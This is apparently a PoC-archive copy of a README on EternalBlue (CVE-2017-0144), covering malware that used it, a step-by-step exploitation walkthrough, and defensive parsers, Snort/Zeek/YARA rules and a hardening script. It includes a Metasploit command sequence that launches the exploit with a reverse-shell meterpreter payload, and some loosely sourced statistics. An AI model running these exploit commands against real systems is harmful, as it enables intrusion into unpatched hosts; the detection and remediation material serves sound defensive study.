Related vulnerability
Title: Microsoft Windows SMB Input Validation Error Vulnerability (CVE-2017-0144) Description: Microsoft Windows and Microsoft Windows Server are products of Microsoft Corporation (US). Microsoft Windows is an operating system for personal devices. Microsoft Windows Server is a server operating system. The Server Message Block (SMB) Server is a component that provides authentication for access to printers and file systems on the server. The SMBv1 server in Microsoft Windows has a remote code execution vulnerability. A remote attacker can use specially crafted packets to exploit this
Description
CVE-2017-0144
Introduction
# 🌐 **CVE-2017-0144 — EternalBlue: Microsoft Windows SMBv1 Remote Code Execution Vulnerability**

> **"One exploit. Dozens of malware families. Billions in damage."**
---
## 🔍 One-line summary
CVE-2017-0144 is a critical remote code-execution vulnerability in the SMBv1 server implementation in Microsoft Windows. The exploit known as EternalBlue abused this hole and was used in high-impact attacks (notably WannaCry).
---
## 🔥 **Top 10 Malware Using EternalBlue (Detailed)**
| # | **Malware** | **Type** | **First Seen** | **Actor** | **Damage** | **Notes** |
|---|------------|---------|----------------|----------|-----------|----------|
| 1 | **WannaCry** | Ransomware | May 12, 2017 | Lazarus Group (DPRK) | **$4–8B** | Killswitch: `iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com` |
| 2 | **NotPetya** | Wiper (Posed as Ransomware) | Jun 27, 2017 | Sandworm (Russia) | **$10B+** | Used Mimikatz + EternalBlue + PSEXEC |
| 3 | **Bad Rabbit** | Ransomware | Oct 24, 2017 | Indrik Spider | Regional | Fake Flash update drive-by |
| 4 | **Uiwix** | Ransomware | May 2017 | Unknown | Low | No killswitch, stealthier than WannaCry |
| 5 | **EternalRocks** | Worm | May 2017 | Unknown | Medium | 7 NSA tools (incl. DoublePulsar) |
| 6 | **Adylkuzz** | Cryptominer | May 2017 | Unknown | High (silent) | Mined Monero *before* WannaCry |
| 7 | **Retefe** | Banking Trojan | 2017–2018 | Unknown | EU Banks | Used EternalBlue for lateral movement |
| 8 | **TrickBot** | Modular Malware | 2017–2021 | Wizard Spider | Global | Dropped Ryuk via EternalBlue |
| 9 | **Emotet** | Loader | 2017–2021 | TA542 | Global | Used as entry for Cobalt Strike |
| 10 | **Clop / Dridex** | Ransomware | 2019–2025 | TA505 | Healthcare, Gov | Still active in 2025 |
---
## 🧨 **EternalBlue Exploit Evolution**
<img width="1915" height="960" alt="eternelblue1" src="https://github.com/user-attachments/assets/fb551517-2bb9-4e07-ab01-2f9f99562a5d" />
| **Tool** | **Release** | **Features** |
|--------|-----------|------------|
| **EternalBlue (Original)** | Apr 2017 (Shadow Brokers) | SMBv1 RCE |
| **DoublePulsar** | Apr 2017 | Backdoor implant (ring0) |
| **EternalRomance** | Apr 2017 | SMBv3 variant |
| **EternalChampion** | Apr 2017 | Alternative SMB path |
| **Metasploit Module** | May 2017 | `exploit/windows/smb/ms17_010_eternalblue` |
| **FuzzBunch** | Apr 2017 | NSA exploit framework |
| **Impacket + PSEXEC** | 2017–2025 | Python SMB exploitation |
<img width="1920" height="955" alt="eternelblue2" src="https://github.com/user-attachments/assets/66e316d0-d86d-403e-b085-d39129c8227e" />
---
# 🔍 **How CVE-2017-0144 (EternalBlue) Was Exploited**
### *A Step-by-Step Technical Deep Dive into the SMBv1 RCE*
> **"One malformed packet. Full SYSTEM access. No login. No click."**
---
## 🎯 **TL;DR Exploit Flow**
```text
[Attacker]
  │
  ├──▶ Sends crafted SMBv1 **Trans2** request
  │      → Triggers **heap overflow** in `srv!SrvOs2FeaListSizeToNt`
  │
  ├──▶ Overwrites function pointers → **kernel shellcode**
  │
  └──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
         (e.g., WannaCry `mssecsvc.exe`)
```
---
## 🛠️ **Prerequisites for Exploitation**
| **Requirement** | **Details** |
|----------------|-----------|
| **Target** | Windows with **SMBv1 enabled** (default pre-Win10) |
| **Port Open** | `445/TCP` (or `139/TCP` via NetBIOS) |
| **No Auth** | **Unauthenticated** — no username/password needed |
| **Architecture** | x86 or x64 (both supported) |
| **Patch Status** | **Unpatched** (pre-MS17-010) |
---
## 🚀 **Exploit Phases (7 Steps)**
### **Phase 1: SMB Protocol Negotiation**
```text
SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed
```
> **Why?** Confirms SMBv1 is active.
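Phase 1 is also the point a defender can watch: a capture in which a server selects an SMBv1 dialect identifies a host that still has SMBv1 enabled. The decoder below is an added example (not the README's code and not from any tool listed on this page); it parses the SMB_COM_NEGOTIATE request and response per MS-CIFS, with constructed sample frames. One caveat matters for inventory work: an SMB2-capable server answers a client that offers `SMB 2.002` / `SMB 2.???` with an SMB2 NEGOTIATE response even when SMBv1 is still enabled on it, so the absence of SMBv1 selections in traffic does not prove SMBv1 is off; host-side checks remain authoritative.

```python
"""Decode a captured SMBv1 NEGOTIATE exchange and report which dialect the
server selected, so SMBv1-speaking hosts can be inventoried from traffic.

Added example for this page (not the README's code, not a project's code).
Layouts follow MS-CIFS 2.2.4.52 (SMB_COM_NEGOTIATE); the request/response
samples at the bottom are constructed.
"""
from __future__ import annotations
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_REPLY = 0x80       # header Flags bit set on responses
NO_DIALECT = 0xFFFF          # DialectIndex meaning "none of the offered dialects"
NBSS_HDR_LEN = 4             # NetBIOS session service header on 445/TCP
SMB_HDR_LEN = 32


def parse_negotiate_request(raw: bytes) -> list[bytes]:
    """Return the dialect strings a client offered, in order (the index matters)."""
    smb = raw[NBSS_HDR_LEN:]
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE or smb[9] & SMB_FLAGS_REPLY:
        raise ValueError("not an SMBv1 NEGOTIATE request")
    word_count = smb[SMB_HDR_LEN]
    bc_off = SMB_HDR_LEN + 1 + 2 * word_count
    byte_count = struct.unpack_from("<H", smb, bc_off)[0]
    buf = smb[bc_off + 2: bc_off + 2 + byte_count]
    dialects = []
    while buf:
        if buf[0] != 0x02:                         # BufferFormat must be SMB_DIALECT
            raise ValueError("malformed dialect entry")
        end = buf.index(b"\x00", 1)                # NUL-terminated ASCII string
        dialects.append(buf[1:end])
        buf = buf[end + 1:]
    return dialects


def parse_negotiate_response(raw: bytes) -> int | str:
    """Return the DialectIndex the server chose, or 'SMB2' when it answered with an
    SMB2 NEGOTIATE response (what an SMB2-capable server does when the client
    offered 'SMB 2.002' / 'SMB 2.???')."""
    smb = raw[NBSS_HDR_LEN:]
    if smb[:4] == SMB2_MAGIC:
        return "SMB2"
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE or not smb[9] & SMB_FLAGS_REPLY:
        raise ValueError("not an SMBv1 NEGOTIATE response")
    if smb[SMB_HDR_LEN] == 0:                      # WordCount 0: error response
        return NO_DIALECT
    return struct.unpack_from("<H", smb, SMB_HDR_LEN + 1)[0]


def negotiated_dialect(request: bytes, response: bytes) -> bytes | None:
    """Dialect both sides settled on; None when the server refused or moved to SMB2."""
    idx = parse_negotiate_response(response)
    if idx == "SMB2" or idx == NO_DIALECT:
        return None
    dialects = parse_negotiate_request(request)
    return dialects[idx] if idx < len(dialects) else None


def server_speaks_smb1(request: bytes, response: bytes) -> bool:
    """True when the server accepted one of the client's SMBv1 dialects."""
    return negotiated_dialect(request, response) is not None


# --- constructed samples ---------------------------------------------------
def _smb1_header(command: int, reply: bool) -> bytes:
    flags = SMB_FLAGS_REPLY if reply else 0
    return SMB1_MAGIC + bytes([command]) + b"\x00" * 4 + bytes([flags]) + b"\x00" * 22


def _frame(smb: bytes) -> bytes:
    return struct.pack(">I", len(smb)) + smb      # NetBIOS session header


def build_negotiate_request(dialects: list[bytes]) -> bytes:
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    return _frame(_smb1_header(SMB_COM_NEGOTIATE, False) + b"\x00" + struct.pack("<H", len(body)) + body)


def build_negotiate_response(dialect_index: int) -> bytes:
    words = struct.pack("<H", dialect_index) + b"\x00" * 32   # 17 words; only DialectIndex is inspected
    return _frame(_smb1_header(SMB_COM_NEGOTIATE, True) + bytes([17]) + words + struct.pack("<H", 0))


LEGACY_CLIENT_REQUEST = build_negotiate_request([b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12"])
MODERN_CLIENT_REQUEST = build_negotiate_request([b"NT LM 0.12", b"SMB 2.002", b"SMB 2.???"])
SMB1_SERVER_RESPONSE = build_negotiate_response(2)       # picked "NT LM 0.12" from the legacy list
REFUSED_RESPONSE = build_negotiate_response(NO_DIALECT)
SMB2_SERVER_RESPONSE = _frame(SMB2_MAGIC + b"\x00" * 60)  # SMB2 header stub: only the magic is inspected

if __name__ == "__main__":
    print(negotiated_dialect(LEGACY_CLIENT_REQUEST, SMB1_SERVER_RESPONSE))   # b'NT LM 0.12'
    print(negotiated_dialect(MODERN_CLIENT_REQUEST, SMB2_SERVER_RESPONSE))   # None
```

Run it over the request/response pairs extracted from a capture (Zeek's `smb_files`/`smb_mapping` logs or a `tcp.port == 445` pcap); any host that returns a non-`SMB2`, non-`0xFFFF` index is speaking SMBv1 and belongs on the remediation list.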
---
### **Phase 2: Tree Connect to IPC$**
<img width="1920" height="955" alt="eternelblue3" src="https://github.com/user-attachments/assets/29c3ecf9-7ae6-4ed6-8057-63c6561133a6" />
```text
\\TARGET\IPC$ → Anonymous share for SMB pipes
```
> **Purpose**: Establishes a session to send transaction requests.
---
### **Phase 3: Trans2 Session Setup (Primary)**
- Uses **SMB_COM_TRANSACTION2** (0x32)
- Subcommand: `SESSION_SETUP`
- Sets up **FEALIST** structure with **malformed size**
```text
FEALIST {
    SizeOfListInBytes = 0xFFFF (or large value)
    ...
}
```
> **Bug Trigger**: `SrvOs2FeaListSizeToNt()` trusts this size without a bounds check.
---
### **Phase 4: Secondary Trans2 Request (Overflow)**
- Sends **multiple** secondary packets
- Each contains **oversized FEALIST + FEA (File Extended Attributes)**
<img width="1920" height="958" alt="eternelblue4" src="https://github.com/user-attachments/assets/36514dfc-d1dc-4669-a021-170e7dca56a2" />
```text
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000 → Overflow buffer
}
```
> **Heap Spray**: Allocates large chunks to control memory layout.
---
### **Phase 5: Buffer Overflow in Kernel**
```c
/* srv!SrvOs2FeaListSizeToNt (WinDbg module!symbol notation), simplified */
SrvOs2FeaListSizeToNt(
    PFEALIST FeaList,          // attacker-controlled
    PULONG   pNtFeaListSize    // output pointer
)
{
    // No validation of FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);   // BOOM
}
```
#### **Result**:
- **Heap overflow** → Overwrite adjacent kernel objects
- Target: **SRVNET_BUFFER** or **POOL_HEADER**
- Overwrite **function pointers** (e.g., `Free` routine)
---
### **Phase 6: Kernel Shellcode Execution**
- Attacker controls **RIP/EIP** via overwritten function pointer
- Jumps to **shellcode in non-paged pool**
#### **Shellcode Does**:
1. **Ring-0 → Ring-3 transition** (via `KeUserModeCallback`)
2. Allocates user-mode memory
3. Downloads/stages payload (e.g., `mssecsvc.exe`)
4. **Installs DoublePulsar backdoor**
---
### **Phase 7: DoublePulsar Backdoor Implant**
<img width="1894" height="957" alt="eternelblue6" src="https://github.com/user-attachments/assets/a7985d43-7eba-4713-aba2-806164e992d4" />
- Injects **kernel driver** (`0x00120034` XOR key)
- Listens for **magic SMB packets**:
  - `Ping`: `0x0002C001`
  - `Exec`: `0x0002C002` + payload
> **WannaCry Example**:
```text
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files
```
---
## 🧨 **Exploit Packet Structure (Simplified)**
```text
SMB Header
└── Command: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Data:
                [FEALIST]
                    SizeOfListInBytes = 0x1100
                    [FEA #1] NameLen=0, Name="A"*0x1000
                    [FEA #2] ...
                [GROOM x100]  → Spray heap
                [OVERFLOW]    → Overwrite pool
                [SHELLCODE]   → x64 ring0
```
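The layout above, and the Phase 3 FEALIST size field it carries, can be checked mechanically: a well-formed FEA list never declares more bytes than the transaction actually transports, and no entry runs past the data that was sent. The parser below is an added example (not the README's code and not from any tool listed on this page). It decodes a NetBIOS-framed SMBv1 TRANSACTION2 request per MS-CIFS, walks the FEA list in a SESSION_SETUP subcommand, and reports the inconsistencies a server has to reject; the 4096-byte threshold mirrors the Zeek rule later on the page, and all sample packets are constructed.

```python
"""Parse an SMBv1 TRANSACTION2 SESSION_SETUP request and report when the FEA
list it carries is inconsistent with the data actually present.

Added example for this page: not the README's code and not from any of the
tools it lists. Layouts follow MS-CIFS (32-byte SMB header,
SMB_COM_TRANSACTION2 request block, SMB_FEA_LIST / SMB_FEA). The sample
packets at the bottom are constructed for the demo.
"""
from __future__ import annotations
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x000E
NBSS_HDR_LEN = 4             # NetBIOS session service header on 445/TCP
SMB_HDR_LEN = 32
# Fixed Trans2 request fields after WordCount: TotalParameterCount,
# TotalDataCount, MaxParameterCount, MaxDataCount, MaxSetupCount, Reserved1,
# Flags, Timeout, Reserved2, ParameterCount, ParameterOffset, DataCount,
# DataOffset, SetupCount, Reserved3 (14 words = 28 bytes).
TRANS2_FIXED = "<HHHHBBHIHHHHHBB"
LARGE_TRANS2_DATA = 4096     # same threshold as the page's Zeek rule


def parse_fea_list(data: bytes) -> tuple[int, list[dict]]:
    """Return (declared SizeOfListInBytes, FEA entries). Each entry records
    whether its declared name/value lengths fit in the bytes really carried."""
    if len(data) < 4:
        raise ValueError("FEA list shorter than its size field")
    declared = struct.unpack_from("<I", data, 0)[0]
    entries, off = [], 4
    while off < len(data):
        if off + 4 > len(data):                       # entry header itself is cut off
            entries.append({"offset": off, "truncated": True})
            break
        _flag, name_len, value_len = struct.unpack_from("<BBH", data, off)
        need = 4 + name_len + 1 + value_len           # header, name, NUL, value
        fits = off + need <= len(data)
        entries.append({"offset": off, "name_len": name_len,
                        "value_len": value_len, "truncated": not fits})
        if not fits:
            break
        off += need
    return declared, entries


def analyze_trans2(raw: bytes) -> dict:
    """Decode one NetBIOS-framed SMBv1 Trans2 request and return findings."""
    smb = raw[NBSS_HDR_LEN:]
    if smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_TRANSACTION2:
        raise ValueError("not an SMBv1 TRANSACTION2 request")
    p = SMB_HDR_LEN + 1                               # skip WordCount
    fields = struct.unpack_from(TRANS2_FIXED, smb, p)
    total_data, data_count, data_off, setup_count = fields[1], fields[11], fields[12], fields[13]
    setup = struct.unpack_from(f"<{setup_count}H", smb, p + struct.calcsize(TRANS2_FIXED))
    result = {"subcommand": setup[0] if setup else None,
              "total_data_count": total_data, "findings": []}
    if total_data > LARGE_TRANS2_DATA:
        result["findings"].append("large_trans2_data")
    if result["subcommand"] != TRANS2_SESSION_SETUP:
        return result
    declared, entries = parse_fea_list(smb[data_off:data_off + data_count])
    result["fea_list_declared"] = declared
    if declared > total_data:
        # The list claims more bytes than the whole transaction says it carries.
        result["findings"].append("fea_list_size_exceeds_data")
    if any(e["truncated"] for e in entries):
        result["findings"].append("fea_entry_truncated")
    return result


def build_trans2_session_setup(data: bytes, total_data: int | None = None) -> bytes:
    """Construct a minimal Trans2 SESSION_SETUP request carrying `data` (for the samples)."""
    setup = struct.pack("<H", TRANS2_SESSION_SETUP)
    # WordCount + fixed block + Setup + ByteCount, then Data; offsets count from the SMB header
    data_off = SMB_HDR_LEN + 1 + struct.calcsize(TRANS2_FIXED) + len(setup) + 2
    total = len(data) if total_data is None else total_data
    fixed = struct.pack(TRANS2_FIXED, 0, total, 0, 0xFFFF, 1, 0, 0, 0, 0,
                        0, data_off, len(data), data_off, 1, 0)
    smb = (SMB_MAGIC + bytes([SMB_COM_TRANSACTION2]) + b"\x00" * 27
           + bytes([14 + 1]) + fixed + setup + struct.pack("<H", len(data)) + data)
    return struct.pack(">I", len(smb)) + smb          # NetBIOS session header


def fea(name: bytes, value: bytes) -> bytes:
    return struct.pack("<BBH", 0, len(name), len(value)) + name + b"\x00" + value


# Constructed samples: the benign list declares exactly the bytes it carries; the
# suspicious one declares 0x10000 bytes, carries a few dozen, and its only entry
# claims a 0x1000-byte value that is not present; the third only overstates
# TotalDataCount and trips the size threshold.
BENIGN_DATA = fea(b".CLASSINFO", b"\x00" * 8)
BENIGN_PACKET = build_trans2_session_setup(struct.pack("<I", 4 + len(BENIGN_DATA)) + BENIGN_DATA)
SUSPICIOUS_PACKET = build_trans2_session_setup(
    struct.pack("<I", 0x10000) + struct.pack("<BBH", 0, 4, 0x1000) + b"AAAA\x00" + b"B" * 16)
OVERSIZED_COUNT_PACKET = build_trans2_session_setup(
    struct.pack("<I", 4 + len(BENIGN_DATA)) + BENIGN_DATA, total_data=5000)

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN_PACKET), ("suspicious", SUSPICIOUS_PACKET),
                       ("oversized", OVERSIZED_COUNT_PACKET)):
        print(label, analyze_trans2(pkt))
```

The "declared size exceeds carried data" check is the server-side invariant the text says the vulnerable routine skipped; as a network heuristic it is cheap and, unlike the byte-pattern signatures further down, does not depend on one particular exploit implementation.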
---
## 🛠️ **Real Exploit Tools**
| **Tool** | **Language** | **Module** |
|--------|------------|----------|
| **Metasploit** | Ruby | `exploit/windows/smb/ms17_010_eternalblue` |
| **Impacket** | Python | `smbclient.py`, `psexec.py` |
| **FuzzBunch** | Python (NSA) | `EternalBlue-2.2.0` |
| **Custom C2** | C/C++ | WannaCry, NotPetya |
### **Metasploit Example**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
```
---
## 🔬 **Memory Forensics Evidence**
| **Artifact** | **Location** | **Value** |
|------------|------------|---------|
| **DoublePulsar** | Kernel memory | XOR key `0x00120034` |
| **Shellcode** | `srvnet.sys` pool | `0xCC 0x90 0x48` pattern |
| **Injected DLL** | `C:\Windows\mssecsvc.exe` | SHA256: `ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa` |
---
## 🛡️ **Detection Rules**
### **Snort/Suricata**
```snort
# SMB over 445/TCP starts with a 4-byte NetBIOS session header, so the SMBv1
# magic sits at offset 4; |32| is the SMB_COM_TRANSACTION2 command byte.
alert tcp any any -> $HOME_NET 445 (msg:"ETERNALBLUE Attempt"; flow:to_server,established; content:"|ff|SMB|32|"; offset:4; depth:5; content:"|00 04 08 00|"; distance:100; within:4; classtype:attempted-admin; sid:1000001; rev:1;)
```
### **Zeek (Bro)**
```zeek
@load base/frameworks/notice
@load base/protocols/smb
module SMB;
redef enum Notice::Type += { Large_Trans2_Data };

# Zeek's SMBv1 Trans2 secondary-request event; args$data_count is the size of
# the data block carried by this fragment.
event smb1_transaction2_secondary_request(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Sec_Args, parameters: string, data: string)
{
    if ( args$data_count > 4096 )
        NOTICE([$note=Large_Trans2_Data, $conn=c, $msg=fmt("Large SMBv1 Trans2 secondary data block (%d bytes)", args$data_count)]);
}
```
---
## 🔄 **Worm Propagation (WannaCry Loop)**
```text
while (true) {
    Scan network for port 445
    if (open)    → EternalBlue exploit
    if (success) → Drop mssecsvc.exe + propagate
    Sleep(random(1000, 5000))
}
```
> **Spread Speed**: ~10,000 infections/hour globally.
---
## 🛑 **Why It Worked So Well**
| **Factor** | **Reason** |
|----------|----------|
| **No Auth** | SMBv1 allows anonymous IPC$ |
| **Wormable** | Built-in LAN scanning |
| **Kernel RCE** | Bypasses AV/user prompts |
| **Legacy SMBv1** | Enabled by default for 15+ years |
| **Unpatched Systems** | XP, 2003, 7 in critical infrastructure |
---
## 🎯 **Exploit Success Rate (2017–2025)**
| **Year** | **Success % (Unpatched)** |
|--------|-------------------------|
| 2017 | **99%** |
| 2020 | **85%** |
| 2025 | **~60%** (legacy only) |
> **Still works on Windows 7/2008 R2 without MS17-010**
---
## 📚 **References**
- [Microsoft MS17-010](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144)
- [RiskSense EternalBlue Analysis](https://www.risksense.com/wp-content/uploads/2017/05/EternalBlue-Exploit-Analysis.pdf)
- [Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb)
- [NSA FuzzBunch Leak](https://github.com/misterch0c/shadowbroker)
---
## ⚡ **Final Summary: How It Was Exploited**
> **EternalBlue = Weaponized Math Error**
> A **trusted size field** in SMB → **kernel heap overflow** → **arbitrary code** → **global ransomware pandemic**
```text
SMB Packet → Buffer Overflow → Kernel Shellcode → DoublePulsar → Malware
```
---
*Visualized, dissected, and battle-tested. For pentesters, IR teams, and defenders.*
> **"One packet. One port. One empire falls."**
---
## 🛡️ **Patch & Detection Matrix**
| **OS** | **KB Patch** | **Disable SMBv1** | **Nmap Script** |
|-------|-------------|-------------------|-----------------|
| Windows 7 / 2008 R2 | KB4012212 | `sc config lanmanworkstation depend= bowser/mrxsmb20/nsi` | `smb-vuln-ms17-010.nse` |
| Windows 10 | KB4013429 | PowerShell: `Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol` | |
| Windows XP (EOL) | **KB4012598** (Emergency) | Registry: `HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0` | |
---
## 🔍 **YARA Rules (Top 3 Malware)**
### 1. **WannaCry**
<img width="1198" height="674" alt="Wana_Decrypt0r_screenshot" src="https://github.com/user-attachments/assets/15a9c213-32ea-419d-b934-0ad38cc673bb" />
```yara
rule WannaCry_Ransomware {
    strings:
        $mz = { 4d 5a }
        $s1 = "WannaDecryptor" wide
        $s2 = "tasksche.exe"
        $s3 = "@WANA" ascii
        $s4 = { 57 61 6E 61 43 72 79 70 74 30 72 }   // "WanaCrypt0r"
    condition:
        $mz at 0 and 2 of ($s*)
}
```
### 2. **NotPetya**
<img width="1198" height="674" alt="Petya A" src="https://github.com/user-attachments/assets/46dee192-85e9-4bb2-8ce3-85a4f3487909" />
```yara
rule NotPetya_Wiper {
    strings:
        $pdb = "perfc.dat" nocase
        $dll = "dllhost.dat"
        $mof = "ntdevmgr.vbs"
        $mimikatz = "mimikatz"
    condition:
        uint16(0) == 0x5A4D and 2 of them
}
```
### 3. **EternalBlue Exploit Packet**
<img width="1916" height="958" alt="nessus1" src="https://github.com/user-attachments/assets/3f2e5ed8-c65c-4f34-ab2d-ebe88aef022c" />
<img width="1920" height="958" alt="nessus2" src="https://github.com/user-attachments/assets/8d78ad4f-bdc4-489b-b7d9-2ede3f9ac574" />
```yara
rule EternalBlue_SMB_Exploit {
    strings:
        // 4-byte NetBIOS session header, then "\xffSMB" + command byte + status
        $smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
        $tree_connect  = { 00 00 00 ?? ff 53 4d 42 75 00 }
        $trans2        = { 00 00 00 ?? ff 53 4d 42 32 00 }
        $overflow      = { 00 04 08 00 }
    condition:
        all of them
}
```
---
## 📊 **2025 Status: Still Active?**
| **Metric** | **Status** |
|----------|----------|
| **Shodan Exposed SMBv1** | **~1.2 million** (Nov 2025) |
| **Active Exploits (Honeypots)** | **Daily** |
| **Ransomware Using It** | Clop, LockBit (legacy targets) |
| **Most Vulnerable** | Healthcare, Manufacturing, SMBs |
| **Zero Trust Fix** | Block 445, enforce MFA, EDR |
---
## 🛑 **Kill Chain (MITRE ATT&CK)**
| **Phase** | **Technique** | **ID** |
|---------|-------------|-------|
| Initial Access | Exploit Public App | T1190 |
| Execution | Windows SMB RCE | T1210 |
| Persistence | Backdoor via DoublePulsar | T1505.003 |
| Lateral Movement | SMB/Windows Admin Shares | T1021.002 |
| Impact | Data Encrypted for Impact | T1486 |
---
## 🛠️ **Full Remediation Script (PowerShell)**
```powershell
#Requires -RunAsAdministrator
# === ETERNALBLUE HARDENING SCRIPT ===
# Windows 8 / Server 2012 and later: Disable-WindowsOptionalFeature and the
# NetSecurity module are not available on Windows 7 / 2008 R2.
Write-Host "Applying EternalBlue Mitigations..." -ForegroundColor Cyan
# 1. Disable SMBv1 (server and client); takes effect after reboot
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# 2. Block inbound 445/TCP (this also blocks legitimate file/print sharing to this host)
New-NetFirewallRule -DisplayName "Block SMB Inbound" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445
# 3. Require SMB signing on both server and client
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord
# 4. Check for an MS17-010 KB. The KB differs per OS, and later cumulative updates
#    supersede these, so a missing KB on a current build is not by itself proof of exposure.
$patch = Get-HotFix | Where-Object { $_.HotFixID -in 'KB4012212','KB4013429','KB4012598' }
if ($patch) { Write-Host "Patched: $($patch.HotFixID -join ', ')" -ForegroundColor Green } else { Write-Host "No MS17-010 KB found - verify via Windows Update history" -ForegroundColor Red }
Write-Host "Reboot required."
```
---
## 📚 **References & Sources**
| **Source** | **Link** |
|----------|--------|
| NVD | [nvd.nist.gov/vuln/detail/CVE-2017-0144](https://nvd.nist.gov/vuln/detail/CVE-2017-0144) |
| Microsoft MS17-010 | [msrc.microsoft.com/update-guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144) |
| MITRE ATT&CK | [attack.mitre.org/techniques/T1210](https://attack.mitre.org/techniques/T1210/) |
| CrowdStrike WannaCry Report | `crowdstrike.com/blog/wannacry` |
| Kaspersky EternalBlue | `kaspersky.com/blog/wannacry-ransomware` |
| Shodan Search | `shodan.io/search?query=port%3A445+os%3A%22Windows%22` |
---
## ⚡ **Final Word (2025)**
> **CVE-2017-0144 is not dead — it’s a legacy zombie.**
> It thrives in:
> - Unpatched Windows 7/2008
> - Shadow IT
> - Air-gapped critical systems
> - Misconfigured cloud VMs
**If you can ping port 445 from the internet — you’re next.**
---
*Built with precision, visuals, and real-world threat intel. Updated Nov 2025.*
*For pentest labs, IR playbooks, or CISO briefings.*
---
> **"Patch it. Block it. Kill it with fire."**
File snapshot
[4.0K] /data/pocs/d82f670084929ce953b2a30ca59570008e6cbc64
└── [ 15K] README.md
1 directory, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is unavailable or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.